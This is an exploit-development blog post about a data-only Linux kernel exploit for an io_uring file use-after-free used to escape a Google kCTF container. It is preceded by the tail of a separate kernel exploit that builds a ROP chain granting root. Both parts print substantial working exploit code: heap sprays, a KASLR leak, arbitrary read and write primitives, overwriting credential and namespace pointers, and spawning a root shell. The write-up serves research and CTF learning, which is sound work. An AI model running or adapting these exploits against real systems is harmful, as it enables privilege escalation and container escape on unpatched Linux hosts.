    open_ptmx[num_ptmx] = fd;

// Check to see if we have a reference to a tty_struct by reading in the magic
// number for the current allocation in our slab
bool found_ptmx(int fd) {
    unsigned char magic_buf[4];
    if (fd < 0) {
        err("Bad fd given to `found_ptmx()`\n");

    ssize_t bytes_read = read(fd, magic_buf, 4);
    if (bytes_read != (ssize_t)bytes_read) {
        err("Failed to read enough bytes from fd: %d", fd);

    if (*(int32_t *)magic_buf != 0x5401) {
        return false;

    return true;

// Leak a tty_struct->ops field which is constant offset from kernel base
uint64_t leak_ops(int fd) {
    if (fd < 0) {
        err("Bad fd given to `leak_ops()`");

    /* tty_struct {
        int magic;      // 4 bytes
        struct kref;    // 4 bytes (single member is an int refcount_t)
        struct device *dev; // 8 bytes
        struct tty_driver *driver; // 8 bytes
        const struct tty_operations *ops; (offset 24 (or 0x18))
    } */

    // Read first 32 bytes of the structure
    unsigned char *ops_buf = calloc(1, 32);
    if (!ops_buf) {
        err("Failed to allocate ops_buf");

    ssize_t bytes_read = read(fd, ops_buf, 32);
    if (bytes_read != (ssize_t)32) {
        err("Failed to read enough bytes from fd: %d", fd);

    uint64_t ops = *(uint64_t *)&ops_buf[24];
    info("tty_struct->ops: 0x%lx", ops);

    // Solve for kernel base, keep the last 12 bits
    uint64_t test = ops & 0b111111111111;

    // These magic compares are for static offsets on this kernel
    if (test == 0xb40ULL) {
        return ops - 0xc39b40ULL;

    else if (test == 0xc60ULL) {
        return ops - 0xc39c60ULL;

    else {
        err("Got an unexpected tty_struct->ops ptr");

void solve_gadgets(void) {
    // 0x723c0: commit_creds
    commit_creds = base + 0x723c0ULL;
    printf("    >> commit_creds located @ 0x%lx\n", commit_creds);

    // 0x72560: prepare_kernel_cred
    prepare_kernel_cred = base + 0x72560ULL;
    printf("    >> prepare_kernel_cred located @ 0x%lx\n", prepare_kernel_cred);

    // 0x800e10: swapgs_restore_regs_and_return_to_usermode
    kpti_tramp = base + 0x800e10ULL + 22; // 22 offset, avoid pops
    printf("    >> kpti_tramp located @ 0x%lx\n", kpti_tramp);

    // 0x14fbea: push rdx; xor eax, 0x415b004f; pop rsp; pop rbp; ret;
    push_rdx = base + 0x14fbeaULL;
    printf("    >> push_rdx located @ 0x%lx\n", push_rdx);

    // 0x35738d: pop rdi; ret;
    pop_rdi = base + 0x35738dULL;
    printf("    >> pop_rdi located @ 0x%lx\n", pop_rdi);

    // 0x487980: xchg rdi, rax; sar bh, 0x89; ret;
    xchg_rdi_rax = base + 0x487980ULL;
    printf("    >> xchg_rdi_rax located @ 0x%lx\n", xchg_rdi_rax);

    // 0x32afea: ret;
    ret = base + 0x32afeaULL;
    printf("    >> ret located @ 0x%lx\n", ret);

// Initialize a kernel message queue
int init_msg_q(void) {
    int msg_qid = msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
    if (msg_qid == -1) {
        err("`msgget()` failed to initialize queue");

    msg_queue[num_queue] = msg_qid;

// Allocate one msg_msg on the heap
size_t send_message() {
    // Calcuate current queue
    if (num_queue < 1) {
        err("`send_message()` called with no message queues");
    int curr_q = msg_queue[num_queue - 1];

    // Send message
    size_t fails = 0;
    struct msgbuf {
        long mtype;
        char mtext[MSG_SZ];
    } msg;

    // Unique identifier we can use
    msg.mtype = 0x1337;

    // Construct the ROP chain
    memset(msg.mtext, 0, MSG_SZ);

    // Pattern for offsets (debugging)
    uint64_t base = 0x41;
    uint64_t *curr = (uint64_t *)&msg.mtext[0];
    for (size_t i = 0; i < 25; i++) {
        uint64_t fill = base << 56;
        fill |= base << 48;
        fill |= base << 40;
        fill |= base << 32;
        fill |= base << 24;
        fill |= base << 16;
        fill |= base << 8;
        fill |= base;
        *curr++ = fill;

    // ROP chain
    uint64_t *rop = (uint64_t *)&msg.mtext[0];
    *rop++ = pop_rdi; 
    *rop++ = 0x0;
    *rop++ = prepare_kernel_cred; // RAX now holds ptr to new creds
    *rop++ = xchg_rdi_rax; // Place creds into RDI 
    *rop++ = commit_creds; // Now we have super powers
    *rop++ = kpti_tramp;
    *rop++ = 0x0; // pop rax inside kpti_tramp
    *rop++ = 0x0; // pop rdi inside kpti_tramp
    *rop++ = (uint64_t)pop_shell; // Return here
    *rop++ = user_cs;
    *rop++ = user_rflags;
    *rop++ = user_sp;
    *rop   = user_ss;

    /* struct tty_operations {
        struct tty_struct * (*lookup)(struct tty_driver *driver,
                struct file *filp, int idx);
        int  (*install)(struct tty_driver *driver, struct tty_struct *tty);
        void (*remove)(struct tty_driver *driver, struct tty_struct *tty);
        int  (*open)(struct tty_struct * tty, struct file * filp);
        void (*close)(struct tty_struct * tty, struct file * filp);
        void (*shutdown)(struct tty_struct *tty);
        void (*cleanup)(struct tty_struct *tty);
        int  (*write)(struct tty_struct * tty,
                const unsigned char *buf, int count);
        int  (*put_char)(struct tty_struct *tty, unsigned char ch);
        void (*flush_chars)(struct tty_struct *tty);
        unsigned int (*write_room)(struct tty_struct *tty);
        unsigned int (*chars_in_buffer)(struct tty_struct *tty);
        int  (*ioctl)(struct tty_struct *tty,
                unsigned int cmd, unsigned long arg);
    } */

    // Populate the 12 function pointers in the table that we have created.
    // There are 3 handlers that are invoked for allocated tty_structs when 
    // their controlling process exits, they are close(), shutdown(),
    // and cleanup(). We have to overwrite these pointers for when we exit our
    // exploit process or else the kernel will panic with a RIP of 
    // 0xdeadbeefdeadbeef. We overwrite them with a simple ret gadget
    uint64_t *func_table = (uint64_t *)&msg.mtext[rop_len];
    for (size_t i = 0; i < 12; i++) {
        // If i == 4, we're on the close() handler, set to ret gadget
        if (i == 4) { *func_table++ = ret; continue; }

        // If i == 5, we're on the shutdown() handler, set to ret gadget
        if (i == 5) { *func_table++ = ret; continue; }

        // If i == 6, we're on the cleanup() handler, set to ret gadget
        if (i == 6) { *func_table++ = ret; continue; }

        // Magic value for debugging
        *func_table++ = 0xdeadbeefdeadbe00 + i;

    // Put our gadget address as the ioctl() handler to pivot stack
    *func_table = push_rdx;

    // Spray msg_msg's on the heap
    if (msgsnd(curr_q, &msg, MSG_SZ, IPC_NOWAIT) == -1) {

    return fails;

// Check to see if we have a reference to one of our msg_msg structs
bool found_msg(int fd) {
    // Read out the msg_msg
    unsigned char msg_buf[GBUF_SZ] = { 0 };
    ssize_t bytes_read = read(fd, msg_buf, GBUF_SZ);
    if (bytes_read != (ssize_t)GBUF_SZ) {
        err("Failed to read from holstein");

    /* msg_msg {
        struct list_head m_list {
            struct list_head *next, *prev;
        } // 16 bytes
        long m_type; // 8 bytes
        int m_ts; // 4 bytes
        struct msg_msgseg* next; // 8 bytes
        void *security; // 8 bytes

        ===== Body Starts Here (offset 48) =====

    // Some heuristics to see if we indeed have a good msg_msg
    uint64_t next = *(uint64_t *)&msg_buf[0];
    uint64_t prev = *(uint64_t *)&msg_buf[sizeof(uint64_t)];
    int64_t m_type = *(uint64_t *)&msg_buf[sizeof(uint64_t) * 2];

    // Not one of our msg_msg structs
    if (m_type != 0x1337L) {
        return false;

    // We have to have valid pointers
    if (next == 0 || prev == 0) {
        return false;

    // I think the pointers should be different as well
    if (next == prev) {
        return false;

    info("Found msg_msg struct:");
    printf("    >> msg_msg.m_list.next: 0x%lx\n", next);
    printf("    >> msg_msg.m_list.prev: 0x%lx\n", prev);
    printf("    >> msg_msg.m_type: 0x%lx\n", m_type);

    // Update rop address
    rop_addr = 48 + next;
    return true;

void overwrite_ops(int fd) {
    unsigned char g_buf[GBUF_SZ] = { 0 };
    ssize_t bytes_read = read(fd, g_buf, GBUF_SZ);
    if (bytes_read != (ssize_t)GBUF_SZ) {
        err("Failed to read enough bytes from fd: %d", fd);

    // Overwrite the tty_struct->ops pointer with ROP address
    *(uint64_t *)&g_buf[24] = fake_table;
    ssize_t bytes_written = write(fd, g_buf, GBUF_SZ);
    if (bytes_written != (ssize_t)GBUF_SZ) {
        err("Failed to write enough bytes to fd: %d", fd);

int main(int argc, char *argv[]) {
    int fd1;
    int fd2;
    int fd3;
    int fd4;
    int fd5;
    int fd6;

    info("Saving user space state...");

    info("Freeing fd1...");
    fd1 = open_device(DEV, O_RDWR);
    fd2 = open(DEV, O_RDWR);

    // Allocate '/dev/ptmx' structs until we allocate one in our free'd slab
    info("Spraying tty_structs...");
    size_t p_remain = PTMX_SPRAY;
    while (p_remain--) {
        printf("    >> tty_struct(s) alloc'd: %lu\n", PTMX_SPRAY - p_remain);

        // Check to see if we found one of our tty_structs
        if (found_ptmx(fd2)) {

        if (p_remain == 0) { err("Failed to find tty_struct"); }

    info("Leaking tty_struct->ops...");
    base = leak_ops(fd2);
    info("Kernel base: 0x%lx", base);

    // Clean up open fds
    info("Cleaning up our tty_structs...");
    for (size_t i = 0; i < num_ptmx; i++) {
        open_ptmx[i] = 0;
    num_ptmx = 0;

    // Solve the gadget addresses now that we have base
    info("Solving gadget addresses");

    // Create a hole for a msg_msg
    info("Freeing fd3...");
    fd3 = open_device(DEV, O_RDWR);
    fd4 = open_device(DEV, O_RDWR);

    // Allocate msg_msg structs until we allocate one in our free'd slab
    size_t q_remain = NUM_QUEUE;
    size_t fails = 0;
    while (q_remain--) {
        // Initialize a message queue for spraying msg_msg structs
        printf("    >> msg_msg queue(s) initialized: %lu\n",
            NUM_QUEUE - q_remain);
        // Spray messages for this queue
        for (size_t i = 0; i < MSG_SPRAY; i++) {
            fails += send_message();

        // Check to see if we found a msg_msg struct
        if (found_msg(fd4)) {
        if (q_remain == 0) { err("Failed to find msg_msg struct"); }
    // Solve our ROP chain address
    info("`msgsnd()` failures: %lu", fails);
    info("ROP chain address: 0x%lx", rop_addr);
    fake_table = rop_addr + rop_len;
    info("Fake tty_struct->ops function table: 0x%lx", fake_table);
    ioctl_ptr = fake_table + ioctl_off;
    info("Fake ioctl() handler: 0x%lx", ioctl_ptr);

    // Do a 3rd UAF
    info("Freeing fd5...");
    fd5 = open_device(DEV, O_RDWR);
    fd6 = open_device(DEV, O_RDWR);

    // Spray more /dev/ptmx terminals
    info("Spraying tty_structs...");
    p_remain = PTMX_SPRAY;
    while(p_remain--) {
        printf("    >> tty_struct(s) alloc'd: %lu\n", PTMX_SPRAY - p_remain);

        // Check to see if we found a tty_struct
        if (found_ptmx(fd6)) {

        if (p_remain == 0) { err("Failed to find tty_struct"); }

    info("Found new tty_struct");
    info("Overwriting tty_struct->ops pointer with fake table...");
    info("Overwrote tty_struct->ops");

    // Spam IOCTL on all of our '/dev/ptmx' fds
    info("Spamming `ioctl()`...");
    for (size_t i = 0; i < num_ptmx; i++) {
        ioctl(open_ptmx[i], 0xcafebabe, rop_addr - 8); // pop rbp; ret;

    return 0;

Escaping the Google kCTF Container with a Data-Only Exploit

By: h0mbre
29 July 2023 at 04:00


I’ve been doing some Linux kernel exploit development/study and vulnerability research off and on since last Fall and a few months ago I had some downtime on vacation to sit and challenge myself to write my first data-only exploit for a real bug that was exploited in kCTF. io_ring has been a popular target in the program’s history up to this point, so I thought I’d find an easy-to-reason-about bug there that had already been exploited as fertile ground for exploit development creativity. The bug I chose to work with was one which resulted in a struct file UAF where it was possible to hold an open file descriptor to the freed object. There have been quite a few write-ups on file UAF exploits, so I decided as a challenge that my exploit had to be data-only. The parameters of the self-imposed challenge were completely arbitrary, but I just wanted to try writing an exploit that didn’t rely on hijacking control flow. I have written quite a few Linux kernel exploits of real kCTF bugs at this point, probably 5-6 as practice, just starting with the vulnerability and going from there, but all of them have ended up in me using ROP, so this was my first try at data-only. I also had not seen a data-only exploit for a struct file UAF yet, which was encouraging as it seemed it was worthwile β€œresearch”. Also, before we get too far, please do not message me to tell me that someone already did xyz years prior. I’m very new to this type of thing and was just doing this as a personal challenge, if some aspects of the exploit are unoriginal, that is by coincidence. I will do my best to cite all my inspiration as we go.

The Bug

The bug is extremely simple (why can’t I find one like this?) and was exploited in kCTF in November of last year. I didn’t look very hard or ask around in the kCTF discord, but I was not able to find a PoC for this particular exploit. I was able to find several good write-ups of exploits leveraging similar vulnerabilities, especially this one by pqlpql and Awarau: https://ruia-ruia.github.io/2022/08/05/CVE-2022-29582-io-uring/.

I won’t go into the bug very much because it wasn’t really important to the excercise of being creative and writing a new kind of exploit (new for me); however, as you can tell from the patch, there was a call to put (decrease) a reference to a file without first checking if the file was a fixed file in the io_uring. There is this concept of fixed files which are managed by the io_uring itself, and there was this pattern throughout that codebase of doing checks on request files before putting them to ensure that they were not fixed files, and in this instance you can see that the check was not performed. So we are able from userspace to open a file (refcount == 1), register the file as a fixed file (recount == 2), call into the buggy code path by submitting an IORING_OP_MSG_RING request which, upon completion will erroneously decrement the refcount (refcount == 1), and then finally, call io_uring_unregister_files which ends up decrementing the recount to 0 and freeing the file while we still maintain an open file descriptor for it. This is about as good as bugs get. I need to find one of these.

What sort of variant analysis can we perform on this type of bug? I’m not so sure, it seems to be a broad category. But the careful code reviewer might have noticed that everywhere else in the codebase when there was the potential of putting a request file, the authors made sure to check if the file was fixed or not. This file put forgot to perform the check. The broad lesson I learned from this was to try and find instances of an action being performed multiple times in a codebase and look for descrepancies between those routines.

Giant Shoulders

It’s extremely important to stress that the blogpost I linked above from @pqlpql and @Awarau1 was very instrumental to this process. In that blogpost they broke-down in exquisite detail how to coerce the Linux kernel to free an entire page of file objects back to the page allocator by utilizing a technique called β€œcross-cache”. file structs have their own dedicated cache in the kernel and so typical object replacement shenanigans in UAF situations aren’t very useful in this instance, regardless of the struct file size. Thanks to their blogpost, the concept of β€œcross-cache” has been used and discussed more and more, at least on Twitter from my anecdotal experience.

Instead of using this trick of getting our entire victim page of file objects sent back to the page allocator only to have the page used as the backing for general cache objects, I elected to have the page reallocated in the form of the a pipe buffer. Please see this blogpost by @pqlpql for more information (this is a great writeup in general). This is an extremely powerful technique because we control all of the contents of the pipe buffer (via writes) and we can read 100% of the page contents (via reads). It’s also extremely reliable in my expierence. I’m not going to go into too much depth here because this wasn’t any of my doing, this is 100% the people mentioned thus far. Please go read the material from them.

Arbitrary Read

The first thing I started to look for, was a way to leak data, because I’ve been hardwired to think that all Linux kernel exploits follow the same pattern of achieving a leak which defeats KASLR, finding some valuable objects in memory, overwriting a function pointer blah blah blah. (Turns out this is not the case and some really talented people have really opened my mind in this area.) The only thing I knew for certain at this point was I have an open file descriptor at my disposal so let’s go looking around the file system code in the Linux kernel. One of the first things that caught my eye was the fcntl syscall in fs/fcntl.c. In general what I was doing at this point, was going through syscall tables for the Linux kernel and seeing which syscalls took an fd as an argument. From there, I would visit the portion of the kernel codebase which handled that syscall implementation and I would ctrl-f for the function copy_to_user. This seemed like a relatively logical way to find a method of leaking data back to userspace.

The copy_to_user function is a key part of the Linux kernel’s interface with user space. It’s used to copy data from the kernel’s own memory space into the memory space of a user process. This function ensures that the copy is done safely, respecting the separation between user and kernel memory.

Now if you go to the source code and do the find on copy_to_user, the 2nd result is a snippet in this bit right here:

static long fcntl_rw_hint(struct file *file, unsigned int cmd,
			  unsigned long arg)
	struct inode *inode = file_inode(file);
	u64 __user *argp = (u64 __user *)arg;
	enum rw_hint hint;
	u64 h;

	switch (cmd) {
	case F_GET_RW_HINT:
		h = inode->i_write_hint;
		if (copy_to_user(argp, &h, sizeof(*argp)))
			return -EFAULT;
		return 0;
	case F_SET_RW_HINT:
		if (copy_from_user(&h, argp, sizeof(h)))
			return -EFAULT;
		hint = (enum rw_hint) h;
		if (!rw_hint_valid(hint))
			return -EINVAL;

		inode->i_write_hint = hint;
		return 0;
		return -EINVAL;

You can see that in the F_GET_RW_HINT case, a u64 (β€œh”), is copied back to userspace. That value comes from the value of inode->i_write_hint. And inode itself is returned from file_inode(file). The source code for that function is as follows:

static inline struct inode *file_inode(const struct file *f)
	return f->f_inode;

Lol, well then. If we control the file, then we control the inode as well. A struct file looks like this:

struct file {
	union {
		struct llist_node	fu_llist;
		struct rcu_head 	fu_rcuhead;
	} f_u;
	struct path		f_path;
	struct inode		*f_inode;	/* cached value */

And since we’re using the pipe buffer as our replacement object (really the entire page), we can set inode to be an arbitrary address. Let’s go check out the inode struct and see what we can learn about this i_write_hint member.

struct inode {
	umode_t			i_mode;
	unsigned short		i_opflags;
	kuid_t			i_uid;
	kgid_t			i_gid;
	unsigned int		i_flags;

	struct posix_acl	*i_acl;
	struct posix_acl	*i_default_acl;

	const struct inode_operations	*i_op;
	struct super_block	*i_sb;
	struct address_space	*i_mapping;

	void			*i_security;

	/* Stat data, not accessed from path walking */
	unsigned long		i_ino;
	 * Filesystems may only read i_nlink directly.  They shall use the
	 * following functions for modification:
	 *    (set|clear|inc|drop)_nlink
	 *    inode_(inc|dec)_link_count
	union {
		const unsigned int i_nlink;
		unsigned int __i_nlink;
	dev_t			i_rdev;
	loff_t			i_size;
	struct timespec64	i_atime;
	struct timespec64	i_mtime;
	struct timespec64	i_ctime;
	spinlock_t		i_lock;	/* i_blocks, i_bytes, maybe i_size */
	unsigned short          i_bytes;
	u8			i_blkbits;
	u8			i_write_hint;

So i_write_hint is a u8, aka, a single byte. This is perfect for what we need, inode becomes the address from which we read a byte back to userland (plus the offset to the member).

Since we control 100% of the backing data of the file, we thus control the value of the inode member. So if we set up a fake file struct in memory via our pipe buffer and have the inode member be 0x1337, the kernel will try to deref 0x1337 as an address and then read a byte at the offset of the i_write_hint member. So this is an arbitrary read for us, and we found it in the dumbest way possible.

This was really encouraging for me that we found an arbitrary read gadget so quickly, but what should we aim the read at?

Finding a Read Target

So we can read data at any address we want, but we don’t know what to read. I struggled thinking about this for a while, but then remembered that the cpu_entry_area was not randomized boot to boot, it is always at the same address. I knew this from the above blogpost about the file UAF, but also vaguely from @ky1ebot tweets like this one.

cpu_entry_area is a special per-CPU area in the kernel that is used to handle some types of interrupts and exceptions. There is this concept of Interrupt Stacks in the kernel that can be used in the event that an exception must be handled for instance.

After doing some debugging with GDB, I noticed that there was at least one kernel text pointer that showed up in the cpu_entry_area consistently and that was an address inside the error_entry function which is as follows:



	testb	$3, CS+8(%rsp)
	jz	.Lerror_kernelspace

	 * We entered from user mode or we're pretending to have entered
	 * from user mode due to an IRET fault.
	/* We have user CR3.  Change to kernel CR3. */
	SWITCH_TO_KERNEL_CR3 scratch_reg=%rax

	leaq	8(%rsp), %rdi			/* arg0 = pt_regs pointer */

	/* Put us onto the real thread stack. */
	call	sync_regs

error_entry seemed to be used as an entry point for handling various exceptions and interrupts, so it made sense to me that an offset inside the function, might be found on what I was guessing was an interrupt stack in the cpu_entry_area. The address was the address of the call sync_regs portion of the function. I was never able to confirm what types of common exceptions/interrupts would’ve been taking place on the system that was pushing that address onto the stack presumably when the call was executed, but maybe someone can chime in and correct me if I’m wrong about this portion of the exploit. It made sense to me at least and the address’ presence in the cpu_entry_area was extremely common to the point that it was never absent during my testing. Armed with a kernel text address at a known offset, we could now defeat KASLR with our arbitrary read. At this point we have the read, the read target, and KASLR defeated.

Again, this portion didn’t take very long to figure out because I had just been introduced to cpu_entry_area by the aforementioned blogposts at the time.

Where are the Write Gadgets?

I actually struggled to find a satisfactory write gadget for a few days. I was kind of spoiled by my experience finding my arbitrary read gadget and thought this would be a similarly easy search. I followed roughly the same process of going through syscalls which took an fd as an argument and tracing through them looking for calls to copy_to_user, but I didn’t have the same luck. During this time, I was discussing the topic with my very talented friend @Firzen14 and he brought up this concept here: https://googleprojectzero.blogspot.com/2022/11/a-very-powerful-clipboard-samsung-in-the-wild-exploit-chain.html#h.yfq0poarwpr9. In the P0 blogpost, they talk about how the signalfd_ctx of a signalfd file is stored in the f.file->private_data field and how the signalfd syscalls allows the attacker to perform a write of the ctx->sigmask. So in our situation, since we control the entire fake file contents, forging a fake signalfd_ctx in memory would be quite easy since we have access to an entire page of memory.

I couldn’t use this technique for my personally imposed challenge though since the technique was already published. But this did open my eyes to the concept of storing contexts and objects in the private_data field of our struct file. So at this point, I went hunting for usages of private_data in the kernel code base. As you can see, the member is used in many many places: https://elixir.bootlin.com/linux/latest/C/ident/private_data.

This was very encouraging to me since I was bound to find some way to achieve an arbitrary write with so many instances of the member being used in so many different code paths; however, I still struggled a while finding a suitable gadget. Finally, I decided to look back at io_uring itself.

Looking for instances where the file->private_data was used, I quickly found an instance right in the very function that was related to the bug. In io_msg_ring, you can see that a target_ctx of type io_ring_ctx is derived from the req->file->private data. Since we control the fake file, we control can control the private_data contents (a pointer to a fake io_ring_ctx in this case).

io_msg_ring is used to pass data from one io ring to another, and you can see that in io_fill_cqe_aux, we actually retrieve a io_uring_cqe struct from our potentially faked io_uring_ctx via io_get_cqe. Immediately, we see several WRITE_ONCE macros used to write data to this object. This was looking extremely promising. I initially was going to use this write as my gadget, but as you will see later, the write sequences and the offsets at which they occur, didn’t really fit my exploitation plan. So for now, we’ll find a 2nd write in the same code path.

Immediately after the call to io_fill_cqe_aux, there is one to io_commit_cqring using our faked io_uring_ctx:

static inline void io_commit_cqring(struct io_ring_ctx *ctx)
	/* order cqe stores with ring update */
	smp_store_release(&ctx->rings->cq.tail, ctx->cached_cq_tail);

This is basically a memcpy, we write the contents of ctx->cached_cq_tail (100% user-controlled) to &ctx->ring->cq.tail (100% user-controlled). The size of the write in this case is 4 bytes. So we have achieved an arbitrary 4 byte write. From here, it just boils down to what type of exploit you want to write, so I decided to do one I had never done in the spirit of my self-imposed challenge.

Exploitation Plan

Now that we have all the possible tools we could need, it was time to start crafting an exploitation plan. In the kCTF environment you are running as an unprivileged user inside of a container, and your goal is to escape the container and read the flag value from the host file system.

I honestly had no idea where to start in this regard, but luckily there are some good articles out there explaining the situation. This post from Cyberark was extremely helpful in understanding how containerization of a task is achieved in the kernel. And I also got some very helpful pointers from Andy Nguyen’s blog post on his kCTF exploit. Huge thanks to Andy for being one of the few to actually detail their steps for escaping the container.

Finding Init

At this point, my goal is to find the host Init task_struct in memory and find the value of a few important members: real_cred, cred, and nsproxy. real_cred is used to track the user and group IDs that were originally responsible for creating the process and unlike cred, real_cred remains constant and does not change due to things like setuid. cred is used to convey the β€œeffective” credentials of a task, like the effective user ID for instance. Finally, and super importantly because we are trapped in a container, nsproxy is a pointer to a struct that contains all of the information about our task’s namespaces like network, mount, IPC, etc. All of these members are pointers, so if we are able to find their values via our arbitrary read, we should then be able to overwrite our own credentials and namespace in our task_struct. Luckily, the address of the init task is a constant offset from the kernel base, so once we broke KASLR with our read of the error_entry address, we can then copy those values with our arbitrary read capability since they would reside at known addresses (offsets from the init task symbol).

Forging Objects

With those values in hand, we now need to find our own task_struct in memory so that we can overwrite our members with those of init. To do this, I took advantage of the fact that the task_struct has a linked list of tasks on the system. So early in the exploit, I spawn a child process with a known name, this name fits within the task_struct comm field, and so as I traverse through the linked list of tasks on the system, I just simply check each task’s comm field for my easily identifiable child process. You can see how I do that in this code snippet:

void traverse_tasks(void)
    // Process name buf
    char current_comm[16] = { 0 };

    // Get the next task after init
    uint64_t current_next = read_8_at(g_init_task + TASKS_NEXT_OFF);
    uint64_t current = current_next - TASKS_NEXT_OFF;

    if (!task_valid(current))
        err("Invalid task after init: 0x%lx", current);    

    // Read the comm
    read_comm_at(current + COMM_OFF, current_comm);
    //printf("    - Address: 0x%lx, Name: '%s'\n", current, current_comm);

    // While we don't have NULL, traverse the list
    while (task_valid(current))
        current_next = read_8_at(current_next);
        current = current_next - TASKS_NEXT_OFF;

        if (current == g_init_task) { break; }

        // Read the comm
        read_comm_at(current + COMM_OFF, current_comm);
        //printf("    - Address: 0x%lx, Name: '%s'\n", current, current_comm);

        // If we find the target comm, save it
        if (!strcmp(current_comm, TARGET_TASK))
            g_target_task = current;

        // If we find our target comm, save it
        if (!strcmp(current_comm, OUR_TASK))
            g_our_task = current;

You can also see that not only did we find our target task, we also found our own task in memory. This is important for the way I chose to exploit this bug because, remember that we need to fake a few objects in memory, like the io_uring_ctx for instance. Usually this done by crafting objects in the kernel heap and somehow discoverying their address with a leak. In my case, I have a whole pipe buffer which is 4096 bytes of memory to utilize. The only problem is, I have no idea where it is. But I do know that I have an open file descriptor to it, and I know that each task has a file descriptor table inside of its files member. After some time printk some offsets, I was able to traverse through my own task’s file descriptor table and learn the address of my pipe buffer. This is because the pipe buffer page is obviously page aligned so I can just page align the address we read from the file descriptor table as the address of our UAF file. So now I know exactly in memory where my pipe buffer is, and I also know what offset onto that page our UAF struct file resides. I have a small helper function to set a β€œscratch space” region address as a global and then use that memory to set up our fake io_uring_ctx. You can see those functions here, first finding our pipe buffer address:

void find_pipe_buf_addr(void)
    // Get the base of the files array
    uint64_t files_ptr = read_8_at(g_file_array);
    // Adjust the files_ptr to point to our fd in the array
    files_ptr += (sizeof(uint64_t) * g_uaf_fd);

    // Get the address of our UAF file struct
    uint64_t curr_file = read_8_at(files_ptr);

    // Calculate the offset
    g_off = curr_file & 0xFFF;

    // Set the globals
    g_file_addr = curr_file;
    g_pipe_buf = g_file_addr - g_off;


And then determining the location of our scratch space where we will forge the fake io_uring_ctx:

// Here, all we're doing is determing what side of the page the UAF file is on,
// if its on the front half of the page, the back half is our scratch space
// and vice versa
void set_scratch_space(void)
    g_scratch = g_pipe_buf;
    if (g_off < 0x500) { g_scratch += 0x500; }

Now we have one more read to do and this is really just to make the exploit easier. In order to avoid a lot of debugging while triggering my write, I need to make sure that my fake io_uring_ctx contains as many valid fields as necessary. If you start with a completely NULL object, you will have to troubleshoot every NULL-deref kernel panic and determine where you went wrong and what kind of value that member should have had. Instead, I chose to copy a legitimate instance of a real io_uring_ctx instead by reading and copying its contents to a global buffer. Working now from a good base, our forged object can then be set-up properly to perform our arbitrary write from, you can see me using the copy and updating the necessary fields here:

void write_setup_ctx(char *buf, uint32_t what, uint64_t where)
    // Copy our copied real ring fd 
    memcpy(&buf[g_off], g_ring_copy, 256);

    // Set f->f_count to 1 
    uint64_t *count = (uint64_t *)&buf[g_off + 0x38];
    *count = 1;

    // Set f->private_data to our scratch space
    uint64_t *private_data = (uint64_t *)&buf[g_off + 0xc8];
    *private_data = g_scratch;

    // Set ctx->cqe_cached
    size_t cqe_cached = g_scratch + 0x240;
    cqe_cached &= 0xFFF;
    uint64_t *cached_ptr = (uint64_t *)&buf[cqe_cached];
    *cached_ptr = NULL_MEM;

    // Set ctx->cqe_sentinel
    size_t cqe_sentinel = g_scratch + 0x248;
    cqe_sentinel &= 0xFFF;
    uint64_t *sentinel_ptr = (uint64_t *)&buf[cqe_sentinel];

    // We need ctx->cqe_cached < ctx->cqe_sentinel
    *sentinel_ptr = NULL_MEM + 1;

    // Set ctx->rings so that ctx->rings->cq.tail is written to. That is at 
    // offset 0xc0 from cq base address
    size_t rings = g_scratch + 0x10;
    rings &= 0xFFF;
    uint64_t *rings_ptr = (uint64_t *)&buf[rings];
    *rings_ptr = where - 0xc0;

    // Set ctx->cached_cq_tail which is our what
    size_t cq_tail = g_scratch + 0x250;
    cq_tail &= 0xFFF;
    uint32_t *cq_tail_ptr = (uint32_t *)&buf[cq_tail];
    *cq_tail_ptr = what;

    // Set ctx->cq_wait the list head to itself (so that it's "empty")
    size_t real_cq_wait = g_scratch + 0x268;
    size_t cq_wait = (real_cq_wait & 0xFFF);
    uint64_t *cq_wait_ptr = (uint64_t *)&buf[cq_wait];
    *cq_wait_ptr = real_cq_wait;

Performing Our Writes

Now, it’s time to do our writes. Remember those three sequential writes we were going to use inside of io_fill_cqe_aux, but I said they wouldn’t work with the exploit plan? Well the reason was, those three writes were as follows:

cqe = io_get_cqe(ctx);
	if (likely(cqe)) {
		WRITE_ONCE(cqe->user_data, user_data);
		WRITE_ONCE(cqe->res, res);
		WRITE_ONCE(cqe->flags, cflags);

They worked really well until I went to overwrite the target nsproxy member of our target child task_struct. One of those writes inevitably overwrote the members right next to nsproxy: signal and sighand. This caused big problems for me because as interrupts occurred, those members (pointers) would be deref’d and cause the kernel to panic since they were invalid values. So I opted to just the 4-byte write instead inside io_commit_cqring. The 4-byte write also caused problems in that at some points current has it’s creds checked and with what basically amounted to a torn 8-byte write, we would leave current cred values in invalid states during these checks. This is why I had to use a child process. Huge shoutout to @pqlpql for tipping me off to this.

Now we can just use those same steps to overwrite the three members real_cred, cred, and nsproxy and now our child has all of the same privileges and capabilities including visiblity into the host root file system that init does. This is perfect, but I still wasn’t able to get the flag!

I started to panic at this point that I had seriously done something wrong. The exploit if FULL of paranoid checks: I reread every overwritten value to make sure it’s correct for instance, so I was confident that I had done the writes properly. It felt like my namespace was somehow not effective yet in the child process, like it was cached somewhere. But then I remembered in Andy Nguyen’s blog post, he used his root privileges to explictly set his namespace values with calls to setns. Once I added this step, the child was able to see the root file system and find the flag. Instead of giving my child the same namespaces as init, I was able to give it the same namespaces of itself lol. I still haven’t followed through on this to determine how setns is implemented, but this could probably be done without explicit setns calls and only with our read and write tools:

// Our child waits to be given super powers and then drops into shell
void child_exec(void)
    // Change our taskname 
    if (prctl(PR_SET_NAME, TARGET_TASK, NULL, NULL, NULL) != 0)
        err("`prctl()` failed");

    while (1)
        if (*(int *)g_shmem == 0x1337)
            info("Child dropping into root shell...");
            if (setns(open("/proc/self/ns/mnt", O_RDONLY), 0) == -1) { err("`setns()`"); }
            if (setns(open("/proc/self/ns/pid", O_RDONLY), 0) == -1) { err("`setns()`"); }
            if (setns(open("/proc/self/ns/net", O_RDONLY), 0) == -1) { err("`setns()`"); }
            char *args[] = {"/bin/sh", NULL, NULL};
            execve(args[0], args, NULL);

        else { sleep(2); }

And finally I was able to drop into a root shell and capture the flag, escaping the container. One huge obstacle when I tried using my exploit on the Google infrastructure was that their kernel was compiled with SELinux support and my test environment was not. This ended up not being a big deal, I had some out of band confirmation/paranoia checks I had to leave out but fortunately the arbitrary read we used isn’t actually hooked in any way by SELinux unlike most of the other fcntl syscall flags. At that point remember, we don’t know enough information to fake any objects in memory so I’d be dead in the water if that read method was ruined by SELinux.


